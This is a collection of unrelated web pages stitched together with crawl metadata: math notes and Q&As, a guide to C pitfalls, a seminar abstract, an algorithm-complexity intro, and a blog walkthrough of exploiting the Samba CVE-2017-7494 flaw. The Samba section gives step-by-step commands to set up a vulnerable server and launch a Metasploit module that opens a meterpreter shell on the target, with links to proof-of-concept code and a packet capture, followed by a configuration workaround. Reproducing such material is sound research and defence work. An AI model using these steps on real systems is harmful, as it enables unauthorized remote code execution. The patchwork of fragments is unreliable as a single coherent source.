The simplest resolution to this is to think of the $$J$$ dimensional Dirichlet distribution as a distribution on the $$J-1$$ numbers $$(q_1, \dots, q_{J-1})$$, satisfying $$\sum_{j=1}^{J-1} q_j \leq 1$$, and then define $$q_J := (1-q_1-q_2-\dots - q_{J-1})$$. Then, if we integrate the density $p(q_1,\dots,q_{J-1} | \alpha) = \frac{\Gamma(\alpha_1+\dots+\alpha_J)}{\Gamma(\alpha_1)\dots \Gamma(\alpha_J)} \prod_{j=1}^{J-1} q_j^{\alpha_j-1} (1-q_1-\dots - q_{J-1})^{\alpha_J-1} \qquad (q_j \geq 0; \quad \sum_{j=1}^{J-1} q_j \leq 1).$ over $$(q_1,\dots,q_{J-1})$$, it integrates to 1 as a density should.
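As a quick check of the connection to the Beta distribution described above, setting $$J=2$$ in this form (so that $$q_2 = 1-q_1$$) gives $p(q_1 | \alpha_1, \alpha_2) = \frac{\Gamma(\alpha_1+\alpha_2)}{\Gamma(\alpha_1)\Gamma(\alpha_2)} q_1^{\alpha_1-1}(1-q_1)^{\alpha_2-1} \qquad (0 \leq q_1 \leq 1),$ which is exactly the $$\text{Beta}(\alpha_1,\alpha_2)$$ density.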
https://ambrevar.xyz/c/index.html

# C: The Dark Corners
C was designed with simplicity in mind. Despite this, C has a lot of dark corners that are not necessarily well known. Here follows an incomplete collection of them.
For historical reasons, we also include some C++ intricacies that may be source of confusion when writing C programs.
## Constancy
### Constant definition
The const keyword always applies to what is immediately to its left or, when there is nothing to its left, to what is to its right.
Both following lines declare a pointer over a constant integer.
const int * pi;
int const * pi;
The following, however, declares a constant pointer over an integer.
int * const pi;
Pay special attention when declaring pointers to arrays because of the operator precedence. Here we have an array of 12 pointers to constant integers.
const int *pi[12];
The next one is a pointer to an array of 12 constant integers.
const int (*pi)[12];
It is always possible to make something constant, but the opposite is not true.
In C++, it is possible to add the const keyword at the end of a method prototype to specify that the method will not modify the object's attributes.
### Constant pointers
The following is forbidden:
char *pc;
const char **ppc;
ppc = &pc; // Forbidden!
This would break the constancy rule, since it would make it possible to modify a const char (reached through **ppc) by writing through *pc.
Suppose it would not be forbidden:
const char c = 'a'; // Constant variable.
char *pc; // Pointer through which we will change c.
const char **ppc = &pc; // Forbidden, but assume it is not.
*ppc = &c; // Legal.
*pc = 'b'; // Change c.
So ppc goes through pc to c. Since pc is not a pointer to a constant, we can change the value, thus ppc constancy is broken.
### C/C++ difference for const
In C, the following
const int a = 10;
int *p = &a;
*p = 30;
printf("&a: %u, a: %d\n", &a, a);
printf("&p: %u, p: %d\n", p, *p);
return 0;
outputs as expected
&a: 1021510500, a: 30
&p: 1021510500, p: 30
But in C++, the previous code won’t be allowed since the const keyword is more restrictive. There is a workaround though:
const int a = 10;
int *p = (int*)(&a);
*p = 30;
printf("&a: %u, a: %d\n", &a, a);
printf("&p: %u, p: %d\n", p, *p);
but the output will be:
&a: 1021510500, a: 10
&p: 1021510500, p: 30
Yes, that is the same address and two different values!
This is because C++ handles const as an immediate value, not a variable. It behaves similarly to #define. The address of a const, albeit grammatically defined, is rather meaningless.
### Constants as static array initializers
Semantically speaking, the const keyword refers to immutable variables and not constant variables, which is an interesting oxymoron.
As such, const variables should not be used to specify the size of statically sized arrays, since the standard requires a semantic constant here, i.e. an integer constant or a preprocessor expression that expands to one.
int array1[17];
const unsigned int sz = sizeof array1;
int array2[sizeof array1]; // OK
int array3[sz]; // Wrong
In practice, most compilers accept const variables in that case; at block scope, C99 simply treats array3 as a variable-length array.
## Function argument evaluation order
From The C Programming Language:
The order in which function arguments are evaluated is unspecified, so the statement printf(“%d %d\n”, ++n, power(2, n)); can produce different results with different compilers, depending on whether n is incremented before power is called.
Thus it is good practice to avoid expressions in function calls.
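A minimal way to observe this is shown below; the helper names are just for illustration. Whether “first” or “second” is printed first depends on the compiler, because the evaluation order of the arguments of sum() is unspecified.

```c
#include <stdio.h>

static int trace(const char *name, int value) {
    printf("evaluating %s\n", name);
    return value;
}

static int sum(int a, int b) {
    return a + b;
}

int main(void) {
    /* The two trace() calls may run in either order. */
    printf("sum == %d\n", sum(trace("first", 1), trace("second", 2)));
    return 0;
}
```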
## Arrays
Arrays are not pointers! There is a small number of cases when they behave differently. The following test is true:
array[0] == *array
From the C standard:
Except when it is the operand of the sizeof operator, the _Alignof operator, or the unary & operator, or is a string literal used to initialize an array, an expression that has type “array of type” is converted to an expression with type “pointer to type” that points to the initial element of the array object and is not an lvalue. If the array object has register storage class, the behavior is undefined.
### Using sizeof
The sizeof operator follows its own set of rules, as described by the standard. When the argument is an array, it returns the total number of bytes occupied by the array.
long array[3];
long *p = array;
printf("%zu\n", sizeof(array));
printf("%zu\n", sizeof(p));
On machines where long is 8 bytes and pointers are 4 bytes, this will output:
24
4
Arrays are automatically converted to pointers in function arguments. Thus the behavior of sizeof is special only within the scope of an array declaration.
void foo(int array[]) {
printf("foo: sizeof array == %zu\n", sizeof array);
}
void bar(int array[12]) {
printf("bar: sizeof array == %zu\n", sizeof array);
}
int main() {
int array[10];
printf("main: sizeof array == %zu\n", sizeof array);
foo(array);
bar(array);
return 0;
}
For multidimensional arrays, only the outermost dimension is converted to a pointer. For instance, int array[M][N] decays to int (*)[N]. The following will output the size of a pointer.
void foo(int (*array)[3]) {
printf("foo: sizeof array == %zu\n", sizeof array);
}
int main() {
int arr[2][3] = {{10, 20, 30}, {40, 50, 60}};
foo(arr);
return 0;
}
### Addressing arrays
Arrays have a type signature that differs from pointers. The signature of a pointer to an n-array of T is T (*)[n].
long array[3];
long *p;
long **pp;
long (*ap)[3];
p = &array; // Wrong
pp = &array; // Wrong
ap = &array; // OK
Note that the warning about type comes from the use of the address-of operator (&), since the following code does not prompt any warning:
long array[3];
long *p;
long (*ap)[3];
p = array; // OK this time
ap = &array; // OK
Conversely, a pointer cannot be assigned to an array:
long array[3];
long *p;
array = p; // Wrong
### Arrays as strings
Arrays can only be initialized with semantic constants.
char *p = "hello";
char t0[] = "world";
char t1[] = {'f', 'o', 'o'};
char t2[] = p; // Error.
char t3[] = (char*) "foo"; // Error.
There is another major difference in the initialization of pointers against arrays. The pointer will only set its value to the address of hello stored in the static memory segment of the program, whereas the array will copy world from this same segment to its allocated memory. The array can be modified afterwards, unlike the underlying value of the pointer.
## Implicit cast
Numbers are automatically promoted to int in arithmetic expressions and when passed to variadic functions such as printf. Compare
unsigned char a = 255;
a++;
printf("%d\n", a);
and
unsigned char a = 255;
printf("%d\n", a+1);
The first snippet prints 0, because the increment wraps around inside the unsigned char, whereas the second prints 256, because the addition is performed after promotion to int. There is no loss of information during such a promotion, except for the char type: C does not specify whether a plain char is signed, so signed or unsigned should be used explicitly to ensure portability.
From The C Programming Language, section 2.7:
Conversion rules are more complicated when unsigned operands are involved. The problem is that comparisons between signed and unsigned values are machine-dependent, because they depend on the sizes of the various integer types. For example, suppose that int is 16 bits and long is 32 bits. Then -1L < 1U, because 1U, which is an int, is promoted to a signed long. But -1L > 1UL, because -1L is promoted to unsigned long and thus appears to be a large positive number.
See appendix A6 in the book for more implicit conversion rules.
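A small, self-contained illustration of the signed/unsigned pitfall (the comparison below behaves the same on any conforming implementation, because -1 converted to unsigned int becomes UINT_MAX):

```c
#include <stdio.h>

int main(void) {
    unsigned int one = 1u;

    /* -1 is converted to unsigned int for the comparison and becomes
     * UINT_MAX, so this "surprising" branch is taken. */
    if (-1 > one)
        printf("-1 > 1u after the implicit conversion\n");

    return 0;
}
```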
## Bit shifting
Be wary of the difference between a logical shift and an arithmetic shift. See this Wikipedia article for more details. Note that it only matters for right shifting.
In C, the result of right-shifting a negative signed number is implementation-defined.
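The following sketch makes the difference visible; it assumes a 32-bit unsigned int for the hexadecimal constant.

```c
#include <stdio.h>

int main(void) {
    int si = -8;
    unsigned int ui = 0xFFFFFFF8u;

    /* Right-shifting a negative signed value is implementation-defined;
     * most compilers perform an arithmetic shift and print -4 here. */
    printf("-8 >> 1 == %d\n", si >> 1);

    /* Right-shifting an unsigned value is always a logical shift. */
    printf("0xFFFFFFF8u >> 1 == 0x%X\n", ui >> 1);

    return 0;
}
```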
## Modulo operation
In C99, the result of a modulo operation has the sign of the dividend:
printf("-5 % 2 = %d\n", -5 % 2);
printf("5 % -2 = %d\n", 5 % -2);
To test whether an integer is odd, you must compare to 0, not 1. Otherwise, the result will be incorrect when the dividend is negative.
if (n % 2 == 1) // WRONG!
if (n % 2 != 0) // Correct.
## Operator precedence
The choice for operator precedence in C can be counter-intuitive at times. The expression a & b == 7 is parsed as a & (b == 7).
See this Wikipedia article for more details.
## File reading
When a file is opened in text mode (e.g. using the "r" option), POSIX specifies that the "b" option is ignored. Some non-POSIX operating systems, however, may try to be too smart: they will expect a “standard” end-of-line, such as \r\n, which will obviously produce unexpected results on files with \n line breaks. The "b" option does no harm and helps portability.
## Globals
Tentative definitions of a global can appear any number of times in C. In C++ they can appear only once, or the compiler will complain about multiple definitions of globals:
#include <stdio.h>
int global;
int global;
int global = 3;
void change() {
global = 17;
}
int main() {
printf("%d\n", global);
change();
printf("%d\n", global);
return 0;
}
In C, it will display the following:
3
17
## Pointer arithmetic
It is not safe to assume that pointer arithmetic results in any particular integral type. Some architectures may have memory addresses indexed over 64-bit values, while using data over 32 bits. The corresponding types are provided by stddef.h; for example, a pointer difference is stored as a ptrdiff_t.
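A short example of the dedicated type in use; %td is the printf conversion for ptrdiff_t (C99):

```c
#include <stdio.h>
#include <stddef.h>

int main(void) {
    int array[10];
    int *first = &array[0];
    int *last = &array[9];

    /* The difference of two pointers into the same array has type ptrdiff_t. */
    ptrdiff_t distance = last - first;
    printf("distance == %td\n", distance);

    return 0;
}
```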
## Size of void
With GCC, sizeof(void) == 1 is true. This is a GCC extension: ISO C does not allow sizeof to be applied to an incomplete type such as void. Using -pedantic will output a warning.
## Alignment
Do not expect the memory layout in structures to be as the code describes it: the compiler is free to pad some memory for optimization purposes.
This proves dangerous when serializing data. Use the offsetof macro to get the real offset of each structure member.
struct {char a; int b;} foo;
struct {char a; char b;} bar;
printf("sizeof foo == %zu\n", sizeof foo);
printf("&foo == %p\n", &foo);
printf("&foo.a == %p\n", &foo.a);
printf("&foo.b == %p\n", &foo.b);
printf("sizeof bar == %zu\n", sizeof bar);
printf("&bar == %p\n", &bar);
printf("&bar.a == %p\n", &bar.a);
printf("&bar.b == %p\n", &bar.b);
## Precompiled headers
Compiling a header file may yield an unexpected result: some compilers such as GCC will recognize the extension and act accordingly. In that case, building a header will not result in an executable, but in a precompiled header, that is, an optimization for large headers.
If you want to force or prevent the build of precompiled headers, GCC allows for specifying the input language:
# The .xml file will be seen as a C header file.
gcc -x c-header myfile.xml
# The .h file will be compiled into an executable.
gcc -x c myfile.h
## Final note
The numerous dark corners of C require some getting used to. It is helpful and good practice to make heavy use of your compiler’s warning flags, together with some fine “lint” tools.
Date: 2016-01-29 (Last update: 2018-11-08)
https://cs.stackexchange.com/questions/110750/can-such-a-turing-recognizable-language-exist

# Can such a Turing-recognizable language exist?
Suppose $$\Sigma = \{a,b\}$$. Is the following claim correct?
There exists a Turing-recognizable language $$L \subseteq \Sigma^*$$ such that its complement is not Turing-recognizable, and for all $$n \in \mathbb{N}$$ it contains exactly $$n$$ strings of length $$n$$.
I'm kind of lost here. Any help would be appreciated.
• Have you tried proving there is no such language? Jun 16, 2019 at 13:34
If $$L$$ is a recognizable language that contains $$f(n)$$ strings of length $$n$$, where $$f$$ is computable, then $$L$$ is in fact computable. Given a string $$x$$ of length $$n$$, calculate $$f(n)$$, and then run a recognizer for $$L$$ on all strings of length $$n$$ in parallel. Eventually you will find all $$f(n)$$ strings recognized by $$L$$. If $$x$$ is one of them, accept, and otherwise, reject. In particular, the language in the question would have $$f(n) = n$$, which is computable, so it would be decidable and its complement would be Turing-recognizable, contradicting the requirement; hence no such language exists.
https://researchseminars.org/talk/agstanford/5/ | # Density of rational points on a family of del Pezzo surface of degree 1
### Julie Desjardins (Toronto)
08-May-2020, 17:45-18:45 (10 months ago)
Abstract: Let $k$ be a number field and $X$ an algebraic variety over $k$. We want to study the set of $k$-rational points $X(k)$. For example, is $X(k)$ empty? If not, is it dense with respect to the Zariski topology? Del Pezzo surfaces are classified by their degrees $d$ (an integer between 1 and 9). Manin and various authors proved that for all del Pezzo surfaces of degree $>1$, the set $X(k)$ is dense provided that the surface has a $k$-rational point (that lies outside a specific subset of the surface for $d=2$). For $d=1$, the del Pezzo surface always has a rational point. However, we don't know if the set of rational points is Zariski-dense. In this talk, I present a result that is joint with Rosa Winter in which we prove the density of rational points for a specific family of del Pezzo surfaces of degree 1 over $k$.
The discussion for Julie Desjardins’s talk is taking place not in zoom-chat, but at tinyurl.com/stagMay08a (and will be deleted after 3-7 days).
algebraic geometry
Audience: researchers in the topic | 2021-02-25 13:00:35 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.859734058380127, "perplexity": 221.68323992184216}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-10/segments/1614178351134.11/warc/CC-MAIN-20210225124124-20210225154124-00227.warc.gz"} |
https://trevorpythag.wordpress.com/tag/integration/ | Archive
Posts Tagged ‘integration’
Fundamental Theorem of Calculus
This theorem forms much of the basis of calculus and the uses of differentiation and integration. It basically states that differentiation and integration are inverse operations, so if you differentiate an integral you'll get back the function you started with. This can be stated as follows:
if $F(x) = \int_{a(x)}^{b(x)} \! f(t) \, dt$ then $\frac{dF}{dx} = f(b(x))\frac{db}{dx} - f(a(x))\frac{da}{dx}$
or in the more simple case
if $F(x) = \int_0^x \! f(t) \, dt$ then $\frac{dF}{dx} = f(x)$
It is this idea that allows us to know, for example,
$\int \! \frac{1}{1+x^2} \, dx = tan^{-1}(x) + c$
from the knowledge that
$\frac{d(tan^{-1}(x))}{dx} = \frac{1}{1+x^2}$
This makes much of integration easier: it is often far easier to work out the derivative of a function than its integral, so we can look for a function which, when differentiated, gives the function we want to integrate, and then conclude that the integral is that function plus a constant.
Categories: calculus, maths
Integrating Fractions – using the natural logarithm – Example tan(x)
From the result found by differentiating the natural logarithm,
$\frac{d}{dx} (ln(f(x))) = \frac{f'(x)}{f(x)}$
for some function f(x),
and the fundamental theorem of calculus, we can say that
$\int \! \frac{f'(x)}{f(x)} \, dx = ln|f(x)| + c$ where c is the integration constant
Simple Example
The most basic example of this is the integration of 1/x,
$\int \! \frac{1}{x} \, dx = ln|x| + c$
More complex example: Integration of tan(x)
A slightly more complicated example of this is the integration of tan(x). To do this we must remember that $tan(x) = \frac{sin(x)}{cos(x)}$ and notice that $\frac{d}{dx}(cos(x)) = -sin(x)$. This means that -tan(x) is of the form $\frac{f'(x)}{f(x)}$ as required. Using this we can get
$\int \! tan(x) \, dx = \int \! \frac{sin(x)}{cos(x)} \, dx = -ln|cos(x)| + c$
Trick for using this identity
Sometimes we get integrals that are almost in this form but not exactly, e.g. $\int \! \frac{x}{5 + x^2} \, dx$; to solve these we can often factorise out a constant so that the integrand is in the required form. In this example we can write $\int \! \frac{x}{5 + x^2} \, dx = \frac{1}{2} \int \! \frac{2x}{ 5 + x^2} \, dx = \frac{1}{2} ln|5 + x^2| + c$
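If you have Python to hand, these results are easy to sanity-check with sympy (assuming it is installed); note that sympy writes the natural logarithm as log and omits the integration constant.
import sympy as sp

x = sp.symbols('x')
print(sp.diff(sp.atan(x), x))            # derivative of arctan: 1/(1 + x**2)
print(sp.integrate(sp.tan(x), x))        # -log(cos(x))
print(sp.integrate(x / (5 + x**2), x))   # log(x**2 + 5)/2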
Categories: calculus | 2018-01-20 16:58:29 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 15, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9967487454414368, "perplexity": 1890.8096562212684}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-05/segments/1516084889677.76/warc/CC-MAIN-20180120162254-20180120182254-00156.warc.gz"} |
http://math.stackexchange.com/questions/169273/antiderivative-help | # Antiderivative Help
I am trying to find $f(x)$ if I know that $$f''(x) = -2+12x-12x^2, \quad \; f(0)=4,\ f'(0)=12$$
First I found the first derivative $$f'(x)= -2x+6x^2-4x^3+C$$
and then I found the function, which is: $$f(x)=-x^2+2x^3-x^4+Cx+D$$
Now I am lost as to what to do with those values they gave me $f(0)=4,\ f'(0)=12$
Where do i proceed from here?
Plug in 0. And I assume the first $-2x$ is supposed to be $-2$? – Mike Jul 11 '12 at 1:05
Nope it should be $-2x$ since im finding the antiderivative right? – soniccool Jul 11 '12 at 1:07
So i should plug in 0 for the second and 0 for the first and get those answers back? – soniccool Jul 11 '12 at 1:07
first, in the $f'$ equation, plug in the point $(0,12)$ and solve for the constant $C$. Then do the same for $D$ in the $f(x)$ equation and you're done! – Robert Mastragostino Jul 11 '12 at 1:09
After finding the value of $f'(x)$ with the unknown constant $C$, use the fact that $f'(0)=12$ to determine the value of $C$. That is, since $$f'(x) = -2x + 6x^2 - 4x^3 + C\quad\text{and}\quad f'(0)=12$$ that means that $$12 = f'(0) = -2(0) + 6(0)^2 - 4(0)^3 + C.$$ This should tell you the value of $C$.
Then find $f(x)$, which will give you another unknown constant $D$. Use the fact that $f(0)=4$ to figure out the value of $D$. | 2015-10-13 13:53:05 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9484612345695496, "perplexity": 125.11309127914396}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-40/segments/1443738006925.85/warc/CC-MAIN-20151001222006-00012-ip-10-137-6-227.ec2.internal.warc.gz"} |
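Not part of the original thread, but if you want to check the final answer, here is a short sympy sketch of the same procedure (assuming sympy is available): integrate twice, then use the two given conditions to pin down the constants.
import sympy as sp

x, C, D = sp.symbols('x C D')
f2 = -2 + 12*x - 12*x**2                 # the given f''(x)
f1 = sp.integrate(f2, x) + C             # f'(x) with unknown constant C
f0 = sp.integrate(f1, x) + D             # f(x) with unknown constant D
C_val = sp.solve(sp.Eq(f1.subs(x, 0), 12), C)[0]   # impose f'(0) = 12
D_val = sp.solve(sp.Eq(f0.subs(x, 0), 4), D)[0]    # impose f(0) = 4
print(f0.subs({C: C_val, D: D_val}))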
https://www.gradesaver.com/textbooks/math/algebra/elementary-and-intermediate-algebra-concepts-and-applications-6th-edition/chapter-4-polynomials-4-3-polynomials-4-3-exercise-set-page-251/11 | ## Elementary and Intermediate Algebra: Concepts & Applications (6th Edition)
$\color{red}{\text{This expression is NOT a polynomial}}$.
Remember that a term is considered as a monomial ONLY IF it is a PRODUCT of constants and/or variables. In this item, the terms are $x^2$, $x$, $1$, $x^3$ and $-7$; however, when combined, they produce a QUOTIENT of constants and/or variables. Therefore, $\color{red}{\text{this expression is NOT a polynomial}}$. | 2018-06-19 13:10:38 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9255894422531128, "perplexity": 468.4033975729473}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-26/segments/1529267862929.10/warc/CC-MAIN-20180619115101-20180619135101-00103.warc.gz"} |
http://wikisecure.net/samba-is-known-namedpipe-function-cve-2017-7494-vulnerability/ | It looks like of late a spree of critical bugs are giving many sleepless nights to several product vendors/researchers! WannaCry is still on the verge and not over yet and then came Adylkuzz. While people are busy fixing their network for those, yet another Samba bug came and can have devastating impacts on the end-user. The flaw is triggered while an arbitrary shared library is being loaded which further leads to a nice remote code execution into the target applcation context. The bug is extremely simple to reproduce via a one-liner using Metasploit (as per HD Moore's tweet). Anyways here I would be explaining the method on how to exploit this vulnerability on a standard Ubuntu installation and how you can pop a meterpreter session of the target machine. For reproducing this bug I've used the followings:
- Ubuntu 16.04
- Metasploit Framework
- Exploit Module (https://goo.gl/g6e8OU)
- Samba v4.5.9 (one of the vulnerable version)
Let's have a walk-through on how to exploit this bug using Metasploit. After the sequence of commands, I've shared a few images and some attack session packet traces (pcaps). This should be helpful for the security researchers out there to come up with the right protections for their corporate products. Let's get started.
Setup exploitable samba:
$ ssh user@target_ip
$ cd ~/Desktop
$ wget -c "https://download.samba.org/pub/samba/stable/samba-4.5.9.tar.gz"
$ tar -zxvf samba-4.5.9.tar.gz
$ cd samba-4.5.9
$ ./configure && make   # You need to install libraries here, if required
$ sudo make install
# Verify the target version
$ ./bin/smbd -V
# Start the samba listener (without running as a daemon) with more debug info
# You may choose the smb.conf which is already present inside the testdata directory
$ sudo ./bin/smbd -i --debuglevel=6 --configfile=./testdata/samba3/smb.conf
Run this set of commands on the attacker host:
$ cd ~/metasploit-framework/
$ git pull
$ ./msfconsole
use exploit/linux/samba/is_known_pipename
show options
set rhost <target_ip>
exploit
boom!! # Enjoy your popped meterpreter session ;)
Below are some of the exploit run screenshots you can refer as well:
Step 01: Launch msfconsole and choose exploit
Step 02: Check target ip and samba version
Step 03: Start samba listener for exploitation:
Step 04: Set Payload and launch exploit!
Step 05: popped shell (meterpreter) !!
Needless to say, this bug can be critical and devastating in a real-world environment. If you don't have an appropriate fix yet, you can apply a temporary workaround by adding the following inside the [global] section (file: smb.conf):
nt pipe support = no
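For context, a minimal sketch of where that line sits in smb.conf (the other entries below are placeholders for whatever is already in your [global] section; restart smbd afterwards so the change takes effect):
[global]
# ... your existing settings stay as they are ...
workgroup = WORKGROUP
# temporary mitigation for CVE-2017-7494
nt pipe support = no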
Additionally, there are some in-the-wild (ITW) Python-based proofs of concept. Make sure you have the right vulnerable version along with the patched impacket if you want to reproduce the Python exploit variant.
Packet capture: You can download the packet capture of this attack session for your further analysis from here. This should be helpful for some security researchers out there!
References:
https://isc.sans.edu/diary.html
https://github.com/rapid7/metasploit-framework/pull/8450
https://github.com/omri9741/cve-2017-7494
https://securityonline.info/cve-2017-7494-samba-remote-code-execution-vulnerability/
https://community.rapid7.com/community/infosec/blog/2017/05/25/patching-cve-2017-7494-in-samba-it-s-the-circle-of-life
Peace!!.. | 2018-03-18 11:41:43 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.28306275606155396, "perplexity": 7003.075778405543}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-13/segments/1521257645613.9/warc/CC-MAIN-20180318110736-20180318130736-00307.warc.gz"} |
https://math.stackexchange.com/questions/13589/statistics-moment-generating-function | # statistics - moment-generating function
Let $Y_1,\dots,Y_n$ be independent and identically distributed random variables such that for $0 < p < 1$, $P(Y_i = 1) = p$ and $P(Y_i = 0) = q = 1-p$.
A. Find the moment-generating functions for the random variable $Y_1$.
B. Find the moment-generating functions for $W = Y_1 + \dots + Y_n$.
C. What is the distribution of $W$?
I have started to try A. My book states that $m(t) = E(e^{tY})$. But I'm not sure what that is. I think the expected value of $Y_1$ is $p$, but I'm not sure where to go from here. I'm completely clueless; statistics is not my area of expertise (I'm a computer science guy).
If those are the only two values that $Y_i$ takes on then you are correct that $E[Y_i]=p$. The definition of the moment generating function is what you have described as $M_{Y_i}(t)=E[e^{tY_i}]$. So you compute this by multiplying $e^{ty_i}$ by your density function and summing over all of the appropriate values. So in this case $M_{Y_i}(t)=(e^{t(0)})(P(Y_i=0))+(e^{t(1)})(P(Y_i=1))$ which gives you $M_{Y_i}(t)=1-p+pe^t$.
For part B you should use the fact that the moment generating function of a sum of independent random variables is the product of the moment generating functions. That gives you $M_W(t)=(1-p+pe^t)^n$ which i believe is the moment generating function for a Binomial random variable with parameters $p$ and $n$. This makes sense if we do a quick mental check and note that $Y_i$ can be thought of as the success or failure of the $i$th trial, the indicator functions. So the total number of successes would be $W$. | 2020-10-19 15:34:32 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8564131259918213, "perplexity": 38.13905689657798}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-45/segments/1603107863364.0/warc/CC-MAIN-20201019145901-20201019175901-00572.warc.gz"} |
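Not part of the original answer, but a quick numerical sanity check of both parts (a sketch using numpy, assuming it is available): simulate $W$ and compare the empirical $E[e^{tW}]$ with $(1-p+pe^t)^n$.
import numpy as np

rng = np.random.default_rng(0)
n, p, t = 10, 0.3, 0.5
trials = 200_000
W = rng.binomial(1, p, size=(trials, n)).sum(axis=1)   # W = Y_1 + ... + Y_n
empirical = np.mean(np.exp(t * W))
theoretical = (1 - p + p * np.exp(t)) ** n
print(empirical, theoretical)   # the two values should be close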
https://notesformsc.org/tag/computer-science/ | # Algorithm Time Complexity
Given a piece of code, how do you determine its complexity without much effort? Each kind of code construct has a time complexity associated with it which you need to learn. Next time you see any complex code, break it into individual pieces and count the time complexity.
Before you begin, learn the basics of algorithm performance and its complexity.
An algorithm has following types of code and we are going to learn time complexity for each one of them.
1. Statements
2. If-Then-else
3. Loops
4. Nested loops
5. Functions
6. Statements with functions.
## Statements
Each statement in an algorithm takes a constant time to execute. Suppose the algorithm procedure has N statements.
Then,
statement 1;
statement 2;
statement 3;
statement n
\begin{aligned}
&Constant \hspace{1mm}time = \mathcal{O}(1)\\ \\
&Total\hspace{1mm} running \hspace{1mm}time = \mathcal{O}(1) + \mathcal{O}(1) + \dots+ \mathcal{O}(1)\\ \\
\end{aligned}
The sum of a fixed number of constant times is still a constant.
Therefore,
